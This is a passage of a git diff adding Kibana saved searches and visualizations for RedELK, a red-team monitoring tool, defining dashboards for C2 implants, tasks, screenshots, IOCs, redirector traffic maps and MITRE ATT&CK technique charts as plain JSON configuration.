+ } + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "RedELK - Redirector Traffic - Alarmed", + "version": 1 + }, + "coreMigrationVersion": "7.16.3", + "id": "658d7180-d4e1-11ea-9301-a30a04251ae9", + "migrationVersion": { + "search": "7.9.3" + }, + "references": [ + { + "id": "redirtraffic", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + } + ], + "sort": [ + 1642171874859, + 225 + ], + "type": "search", + "version": "1" + }, + { + "attributes": { + "columns": [ + "implant.id", + "infra.attack_scenario", + "host.name", + "user.name", + "host.ip_int", + "host.ip_ext", + "implant.arch", + "host.os.name", + "host.os.version", + "host.os.kernel", + "implant.parent_id", + "host.geo.as.organization.name", + "host.geo.country_iso_code" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "highlightAll": true, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "" + }, + "version": true + } + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "RedELK - C2 implants overview", + "version": 1 + }, + "coreMigrationVersion": "7.16.3", + "id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", + "migrationVersion": { + "search": "7.9.3" + }, + "references": [ + { + "id": "implantsdb", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + } + ], + "sort": [ + 1642171874859, + 227 + ], + "type": "search", + "version": "1" + }, + { + "attributes": { + "columns": [ + "iplist.name", + "iplist.source", + "iplist.ip" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "highlightAll": true, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "" + }, + "version": true + } + }, + "sort": [], + "title": "RedELK - IP Lists", + "version": 1 + }, + "coreMigrationVersion": "7.16.3", + "id": "87530b40-9269-11eb-a753-9da683898c26", + "migrationVersion": { + "search": "7.9.3" + }, + "references": [ + { + "id": "789bb360-2ab1-11eb-bc47-53169c986c81", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + } + ], + "sort": [ + 1642171874859, + 229 + ], + "type": "search", + "version": "1" + }, + { + "attributes": { + "columns": [ + "bluechecktype", + "message" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "highlightAll": true, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "" + }, + "version": true + } + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "RedELK - BlueCheck", + "version": 1 + }, + "coreMigrationVersion": "7.16.3", + "id": "a4757c90-ce50-11ea-a580-918d4757c08d", + "migrationVersion": { + "search": "7.9.3" + }, + "references": [ + { + "id": "bluecheck", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + } + ], + "sort": [ + 1643015939090, + 281 + ], + "type": "search", + "version": "1" + }, + { + "attributes": { + "columns": [ + "attackscenario", + "from", + "to", + "subject", + "emailfolder" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "highlightAll": true, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "" + }, + "version": true + } + }, + "sort": [], + "title": "RedELK - Emails", + "version": 1 + }, + "coreMigrationVersion": "7.16.3", + "id": "c1fca0d0-d171-11ea-8ac3-bfcfabda2250", + "migrationVersion": { + "search": "7.9.3" + }, + "references": [ + { + "id": "email", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + } + ], + "sort": [ + 1642171874859, + 231 + ], + "type": "search", + "version": "1" + }, + { + "attributes": { + "columns": [ + "user.name", + "host.name", + "c2.message", + "threat.technique.id" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "c2.log.type", + "negate": false, + "params": { + "query": "implant_task" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "c2.log.type": "implant_task" + } + } + } + ], + "highlightAll": true, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "" + }, + "version": true + } + }, + "sort": [], + "title": "RedELK - C2 Tasks", + "version": 1 + }, + "coreMigrationVersion": "7.16.3", + "id": "cc523820-d021-11ea-9301-a30a04251ae9", + "migrationVersion": { + "search": "7.9.3" + }, + "references": [ + { + "id": "rtops", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "rtops", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ], + "sort": [ + 1642171874859, + 234 + ], + "type": "search", + "version": "1" + }, + { + "attributes": { + "columns": [ + "c2.message", + "host.name", + "user.name", + "implant.id" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "event.module", + "negate": false, + "params": { + "query": "redelk" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.module": "redelk" + } + } + } + ], + "highlightAll": true, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "" + }, + "version": true + } + }, + "sort": [], + "title": "RedELK - Signals", + "version": 1 + }, + "coreMigrationVersion": "7.16.3", + "id": "dddbba20-d04f-11ea-9301-a30a04251ae9", + "migrationVersion": { + "search": "7.9.3" + }, + "references": [ + { + "id": "195a3f00-d04f-11ea-9301-a30a04251ae9", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "195a3f00-d04f-11ea-9301-a30a04251ae9", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ], + "sort": [ + 1642171874859, + 237 + ], + "type": "search", + "version": "1" + }, + { + "attributes": { + "columns": [ + "infra.attack_scenario", + "host.name", + "user.name", + "screenshot.full", + "screenshot.thumb" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "c2.log.type", + "negate": false, + "params": { + "query": "screenshots" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "c2.log.type": "screenshots" + } + } + } + ], + "highlightAll": true, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "lucene", + "query": "" + }, + "version": true + } + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "RedELK - C2 Screenshots", + "version": 1 + }, + "coreMigrationVersion": "7.16.3", + "id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", + "migrationVersion": { + "search": "7.9.3" + }, + "references": [ + { + "id": "rtops", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "rtops", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ], + "sort": [ + 1642171874859, + 240 + ], + "type": "search", + "version": "1" + } +] \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_visualization.json b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_visualization.json new file mode 100644 index 00000000..7b198e16 --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_visualization.json @@ -0,0 +1,5064 @@ +[ + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - IOC over time", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": {}, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "drop_partials": false, + "extended_bounds": {}, + "field": "@timestamp", + "interval": "auto", + "min_doc_count": 1, + "scaleMetricValues": false, + "timeRange": { + "from": "now-12M", + "to": "now" + }, + "useNormalizedEsInterval": true + }, + "schema": "segment", + "type": "date_histogram" + }, + { + "enabled": true, + "id": "3", + "params": { + "customLabel": "IOC Type", + "field": "ioc.type", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 10 + }, + "schema": "group", + "type": "terms" + } + ], + "params": { + "addLegend": true, + "addTimeMarker": false, + "addTooltip": true, + "categoryAxes": [ + { + "id": "CategoryAxis-1", + "labels": { + "filter": true, + "show": true, + "truncate": 100 + }, + "position": "bottom", + "scale": { + "type": "linear" + }, + "show": true, + "style": {}, + "title": {}, + "type": "category" + } + ], + "detailedTooltip": true, + "grid": { + "categoryLines": false + }, + "isVislibVis": true, + "labels": { + "show": false + }, + "legendPosition": "right", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "seriesParams": [ + { + "circlesRadius": 1, + "data": { + "id": "1", + "label": "Count" + }, + "drawLinesBetweenPoints": true, + "lineWidth": 2, + "mode": "stacked", + "show": true, + "showCircles": true, + "type": "histogram", + "valueAxis": "ValueAxis-1" + } + ], + "thresholdLine": { + "color": "#E7664C", + "show": false, + "style": "full", + "value": 10, + "width": 1 + }, + "times": [], + "type": "histogram", + "valueAxes": [ + { + "id": "ValueAxis-1", + "labels": { + "filter": false, + "rotate": 0, + "show": true, + "truncate": 100 + }, + "name": "LeftAxis-1", + "position": "left", + "scale": { + "mode": "normal", + "type": "linear" + }, + "show": true, + "style": {}, + "title": { + "text": "Count" + }, + "type": "value" + } + ] + }, + "title": "RedELK - IOC over time", + "type": "histogram" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "057076f0-d4e4-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 99 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - Screenshots over time", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "Screenshots" + }, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "drop_partials": false, + "extended_bounds": {}, + "field": "@timestamp", + "interval": "auto", + "min_doc_count": 1, + "scaleMetricValues": false, + "timeRange": { + "from": "now-30d", + "to": "now" + }, + "useNormalizedEsInterval": true + }, + "schema": "segment", + "type": "date_histogram" + } + ], + "params": { + "addLegend": true, + "addTimeMarker": false, + "addTooltip": true, + "categoryAxes": [ + { + "id": "CategoryAxis-1", + "labels": { + "filter": true, + "show": true, + "truncate": 100 + }, + "position": "bottom", + "scale": { + "type": "linear" + }, + "show": true, + "style": {}, + "title": {}, + "type": "category" + } + ], + "detailedTooltip": true, + "grid": { + "categoryLines": false + }, + "isVislibVis": true, + "labels": { + "show": false + }, + "legendPosition": "top", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "seriesParams": [ + { + "circlesRadius": 1, + "data": { + "id": "1", + "label": "Screenshots" + }, + "drawLinesBetweenPoints": true, + "lineWidth": 2, + "mode": "stacked", + "show": true, + "showCircles": true, + "type": "histogram", + "valueAxis": "ValueAxis-1" + } + ], + "thresholdLine": { + "color": "#E7664C", + "show": false, + "style": "full", + "value": 10, + "width": 1 + }, + "times": [], + "type": "histogram", + "valueAxes": [ + { + "id": "ValueAxis-1", + "labels": { + "filter": false, + "rotate": 0, + "show": true, + "truncate": 100 + }, + "name": "LeftAxis-1", + "position": "left", + "scale": { + "mode": "normal", + "type": "linear" + }, + "show": true, + "style": {}, + "title": { + "text": "Screenshots" + }, + "type": "value" + } + ] + }, + "title": "RedELK - Screenshots over time", + "type": "histogram" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "0b5ffcd0-d317-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 101 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "title": "RedELK - Dashboard links internal", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [], + "params": { + "fontSize": 12, + "markdown": "**Dashboards** : [Summary](/app/dashboards#/view/02486040-d355-11ea-9301-a30a04251ae9) | [Alarms](/app/dashboards#/view/53b69200-d4e3-11ea-9301-a30a04251ae9) | [Traffic](/app/dashboards#/view/0f8626d0-c6f4-11e8-a9c6-cd307b96b1ba) | [Implants](/app/dashboards#/view/117dbba0-c6f5-11e8-a9c6-cd307b96b1ba) | [Red Team Operations](/app/dashboards#/view/04b87c50-d028-11ea-9301-a30a04251ae9) | [Tasks](/app/dashboards#/view/0523c8a0-d025-11ea-9301-a30a04251ae9) | [Downloads](/app/dashboards#/view/643de010-d04c-11ea-9301-a30a04251ae9) | [Credentials](/app/dashboards#/view/82b865a0-d318-11ea-9301-a30a04251ae9) | [Screenshots](/app/dashboards#/view/a2dcebf0-d316-11ea-9301-a30a04251ae9) | [IOC](/app/dashboards#/view/86643e90-d4e4-11ea-9301-a30a04251ae9) | [TTP](/app/dashboards#/view/3ed7a630-d051-11ea-9301-a30a04251ae9) | [Health](/app/dashboards#/view/509e6a80-926a-11eb-a753-9da683898c26)", + "openLinksInNewTab": false + }, + "title": "RedELK - Dashboard links internal", + "type": "markdown" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "0f82b540-d237-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [], + "sort": [ + 1642171875895, + 102 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "c2.log.type", + "negate": false, + "params": { + "query": "implant_newimplant" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "c2.log.type": "implant_newimplant" + } + } + } + ], + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "" + } + } + }, + "title": "RedELK - Top computers with new implants", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "Amount of implants" + }, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "customLabel": "Hostname", + "field": "host.name", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 17 + }, + "schema": "segment", + "type": "terms" + }, + { + "enabled": true, + "id": "3", + "params": { + "customLabel": "Username", + "field": "user.name", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 10 + }, + "schema": "segment", + "type": "terms" + } + ], + "params": { + "addLegend": true, + "addTooltip": true, + "distinctColors": true, + "isDonut": true, + "labels": { + "last_level": true, + "show": false, + "truncate": 100, + "values": true + }, + "legendPosition": "right", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "type": "pie" + }, + "title": "RedELK - Top computers with new implants", + "type": "pie" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "10dcc4a0-b8e7-11e8-94dd-171ae5c1fd1a", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "rtops", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "rtops", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + } + ], + "sort": [ + 1642171875895, + 105 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "lucene", + "query": "NOT (redir.backend.name: c2*)" + } + } + }, + "title": "RedELK - Redirector Traffic - Decoy", + "uiStateJSON": "{\"mapCenter\":[32.93684850365019,0.7170999376103283],\"mapZoom\":2}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "Source IP", + "field": "source.ip" + }, + "schema": "metric", + "type": "cardinality" + }, + { + "enabled": true, + "id": "2", + "params": { + "autoPrecision": true, + "customLabel": "", + "field": "source.geo.location", + "isFilteredByCollar": true, + "precision": 2, + "useGeocentroid": true + }, + "schema": "segment", + "type": "geohash_grid" + } + ], + "params": { + "addTooltip": true, + "colorSchema": "Yellow to Red", + "heatClusterSize": 1.5, + "isDesaturated": true, + "legendPosition": "bottomright", + "mapCenter": [ + 0, + 0 + ], + "mapType": "Heatmap", + "mapZoom": 2, + "wms": { + "baseLayersAreLoaded": {}, + "enabled": false, + "options": { + "format": "image/png", + "transparent": true + }, + "selectedTmsLayer": { + "attribution": "

© OpenStreetMap contributors | Elastic Maps Service

", + "id": "road_map", + "maxZoom": 18, + "minZoom": 0, + "subdomains": [], + "url": "https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc" + }, + "tmsLayers": [ + { + "attribution": "

© OpenStreetMap contributors | Elastic Maps Service

", + "id": "road_map", + "maxZoom": 18, + "minZoom": 0, + "subdomains": [], + "url": "https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc" + } + ] + } + }, + "title": "RedELK - Redirector Traffic - Decoy", + "type": "tile_map" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "10dd40f0-b983-11e8-94dd-171ae5c1fd1a", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "redirtraffic", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + } + ], + "sort": [ + 1642171875895, + 107 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "lucene", + "query": "(redir.backend.name: c2*)" + } + } + }, + "title": "RedELK - Redirector Traffic - C2", + "uiStateJSON": "{\"mapCenter\":[32.93684850365019,0.7170999376103283],\"mapZoom\":2}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "Source IP", + "field": "source.ip" + }, + "schema": "metric", + "type": "cardinality" + }, + { + "enabled": true, + "id": "2", + "params": { + "autoPrecision": true, + "customLabel": "", + "field": "source.geo.location", + "isFilteredByCollar": true, + "precision": 2, + "useGeocentroid": true + }, + "schema": "segment", + "type": "geohash_grid" + } + ], + "params": { + "addTooltip": true, + "colorSchema": "Yellow to Red", + "heatClusterSize": 1.5, + "isDesaturated": true, + "legendPosition": "bottomright", + "mapCenter": [ + 0, + 0 + ], + "mapType": "Heatmap", + "mapZoom": 2, + "wms": { + "baseLayersAreLoaded": {}, + "enabled": false, + "options": { + "format": "image/png", + "transparent": true + }, + "selectedTmsLayer": { + "attribution": "

© OpenStreetMap contributors | Elastic Maps Service

", + "id": "road_map", + "maxZoom": 18, + "minZoom": 0, + "subdomains": [], + "url": "https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc" + }, + "tmsLayers": [ + { + "attribution": "

© OpenStreetMap contributors | Elastic Maps Service

", + "id": "road_map", + "maxZoom": 18, + "minZoom": 0, + "subdomains": [], + "url": "https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc" + } + ] + } + }, + "title": "RedELK - Redirector Traffic - C2", + "type": "tile_map" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "1d26da60-b983-11e8-94dd-171ae5c1fd1a", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "redirtraffic", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + } + ], + "sort": [ + 1642171875895, + 109 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - IP Lists metrics", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "IPs" + }, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "field": "iplist.name", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": true, + "otherBucketLabel": "Other", + "size": 30 + }, + "schema": "group", + "type": "terms" + } + ], + "params": { + "addLegend": false, + "addTooltip": true, + "metric": { + "colorSchema": "Green to Red", + "colorsRange": [ + { + "from": 0, + "to": 10000 + } + ], + "invertColors": false, + "labels": { + "show": true + }, + "metricColorMode": "None", + "percentageMode": false, + "style": { + "bgColor": false, + "bgFill": "#000", + "fontSize": 60, + "labelColor": false, + "subText": "" + }, + "useRanges": false + }, + "type": "metric" + }, + "title": "RedELK - IP Lists metrics", + "type": "metric" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "20fac240-926c-11eb-a753-9da683898c26", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "87530b40-9269-11eb-a753-9da683898c26", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 111 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - MITRE ATT&CK Techniques", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": {}, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "drop_partials": false, + "extended_bounds": {}, + "field": "@timestamp", + "interval": "auto", + "min_doc_count": 1, + "scaleMetricValues": false, + "timeRange": { + "from": "now-6h", + "to": "now" + }, + "useNormalizedEsInterval": true + }, + "schema": "segment", + "type": "date_histogram" + }, + { + "enabled": true, + "id": "3", + "params": { + "field": "signal.rule.threat.technique.name", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": true, + "otherBucketLabel": "Other", + "size": 100 + }, + "schema": "group", + "type": "terms" + } + ], + "params": { + "addLegend": true, + "addTimeMarker": false, + "addTooltip": true, + "categoryAxes": [ + { + "id": "CategoryAxis-1", + "labels": { + "filter": true, + "show": true, + "truncate": 100 + }, + "position": "bottom", + "scale": { + "type": "linear" + }, + "show": true, + "style": {}, + "title": {}, + "type": "category" + } + ], + "detailedTooltip": true, + "grid": { + "categoryLines": false + }, + "isVislibVis": true, + "labels": { + "show": false + }, + "legendPosition": "right", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "seriesParams": [ + { + "circlesRadius": 1, + "data": { + "id": "1", + "label": "Count" + }, + "drawLinesBetweenPoints": true, + "lineWidth": 2, + "mode": "stacked", + "show": true, + "showCircles": true, + "type": "histogram", + "valueAxis": "ValueAxis-1" + } + ], + "thresholdLine": { + "color": "#E7664C", + "show": false, + "style": "full", + "value": 10, + "width": 1 + }, + "times": [], + "type": "histogram", + "valueAxes": [ + { + "id": "ValueAxis-1", + "labels": { + "filter": false, + "rotate": 0, + "show": true, + "truncate": 100 + }, + "name": "LeftAxis-1", + "position": "left", + "scale": { + "mode": "normal", + "type": "linear" + }, + "show": true, + "style": {}, + "title": { + "text": "Count" + }, + "type": "value" + } + ] + }, + "title": "RedELK - MITRE ATT&CK Techniques", + "type": "histogram" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "231792d0-d050-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "dddbba20-d04f-11ea-9301-a30a04251ae9", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 113 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - MITRE ATT&CK Tactics", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": {}, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "drop_partials": false, + "extended_bounds": {}, + "field": "@timestamp", + "interval": "auto", + "min_doc_count": 1, + "scaleMetricValues": false, + "timeRange": { + "from": "now-6h", + "to": "now" + }, + "useNormalizedEsInterval": true + }, + "schema": "segment", + "type": "date_histogram" + }, + { + "enabled": true, + "id": "3", + "params": { + "field": "signal.rule.threat.tactic.name", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": true, + "otherBucketLabel": "Other", + "size": 100 + }, + "schema": "group", + "type": "terms" + } + ], + "params": { + "addLegend": true, + "addTimeMarker": false, + "addTooltip": true, + "categoryAxes": [ + { + "id": "CategoryAxis-1", + "labels": { + "filter": true, + "show": true, + "truncate": 100 + }, + "position": "bottom", + "scale": { + "type": "linear" + }, + "show": true, + "style": {}, + "title": {}, + "type": "category" + } + ], + "detailedTooltip": true, + "grid": { + "categoryLines": false + }, + "isVislibVis": true, + "labels": { + "show": false + }, + "legendPosition": "right", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "seriesParams": [ + { + "circlesRadius": 1, + "data": { + "id": "1", + "label": "Count" + }, + "drawLinesBetweenPoints": true, + "lineWidth": 2, + "mode": "stacked", + "show": true, + "showCircles": true, + "type": "histogram", + "valueAxis": "ValueAxis-1" + } + ], + "thresholdLine": { + "color": "#E7664C", + "show": false, + "style": "full", + "value": 10, + "width": 1 + }, + "times": [], + "type": "histogram", + "valueAxes": [ + { + "id": "ValueAxis-1", + "labels": { + "filter": false, + "rotate": 0, + "show": true, + "truncate": 100 + }, + "name": "LeftAxis-1", + "position": "left", + "scale": { + "mode": "normal", + "type": "linear" + }, + "show": true, + "style": {}, + "title": { + "text": "Count" + }, + "type": "value" + } + ] + }, + "title": "RedELK - MITRE ATT&CK Tactics", + "type": "histogram" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "2f5a2760-d050-11ea-9301-a30a04251ae9", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "dddbba20-d04f-11ea-9301-a30a04251ae9", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 1642171875895, + 115 + ], + "type": "visualization", + "version": "1" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "RedELK - IP Lists donut", + "uiStateJSON": "{}", + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": {}, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "3", + "params": { + "field": "iplist.source", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 5 + }, + "schema": "segment", + "type": "terms" + }, + { + "enabled": true, + "id": "2", + "params": { + "field": "iplist.name", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": true, + "otherBucketLabel": "Other", + "size": 30 + }, + "schema": "segment", + "type": "terms" + } + ], + "params": { + "addLegend": true, + "addTooltip": true, + "distinctColors": true, + "isDonut": true, + "labels": { + "last_level": true, + "show": true, + "truncate": 100, + "values": true + }, + "legendPosition": "bottom", + "palette": { + "name": "kibana_palette", + "type": "palette" + }, + "type": "pie" + }, + "title": "RedELK - IP Lists donut", + "type": "pie" + } + }, + "coreMigrationVersion": "7.16.3", + "id": "2f77a150-926a-11eb-a753-9da683898c26", + "migrationVersion": { + "visualization": "7.14.0" + }, + "references": [ + { + "id": "87530b40-9269-11eb-a753-9da683898c26", + "name": "search_0", + "type": "search" + } + ], + "sort": [ + 